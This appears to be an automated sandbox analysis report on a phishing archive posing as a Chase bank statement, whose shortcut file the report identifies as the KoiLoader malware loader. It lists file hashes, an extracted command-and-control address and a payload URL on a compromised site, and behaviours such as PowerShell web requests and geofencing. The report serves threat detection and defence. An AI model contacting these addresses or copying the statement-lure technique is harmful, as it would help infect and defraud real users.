General

  • Target

    chase_may_statement.zip

  • Size

    856B

  • Sample

    250521-y7f14askz9

  • MD5

    703c9ab297b4f6c2d97ecccf2295697f

  • SHA1

    1d309647d121596d2a9a5bca27efa4cb3a77f17c

  • SHA256

    e94ee95203d453093817a2f653b65e82781e16f9fe6001258c96f4cb545e466f

  • SHA512

    0e48ec75073d6d2930b68932e876459c5d66cd1c9fda05161ffbfc984a68a32e0d4cf0ff2ba48e7abe54be1838d6cfe2e208bffcb5ac0e7df91844a4c0c5c5e3

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02

Extracted

Family

koiloader

C2

http://193.23.219.255/relabel.php

Attributes
  • payload_url

    https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02

Targets

    • Target

      chase_may_statement.lnk

    • Size

      1KB

    • MD5

      6ee8fd49c4dd5141531a3f7a20e0e7f9

    • SHA1

      d882bedf16272cd898039255c36a54ef1a13eaa9

    • SHA256

      5854c6560fe3bf47cad820d55fa798385439821c8c87b5b0df83995df320ab5b

    • SHA512

      8936a6ff9c5e7f3e4a66dd2855cfc4315053496c33f8edb860b921d5b7d205afab2b8612fa381a00b9bdd480f633377843dc85231186d3324972ea6cf37a4404

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • Koiloader family

    • Detects KoiLoader payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Indicator Removal: Clear Persistence

      Clear artifacts associated with previously established persistence like scheduletasks on a host.

MITRE ATT&CK Enterprise v16

Tasks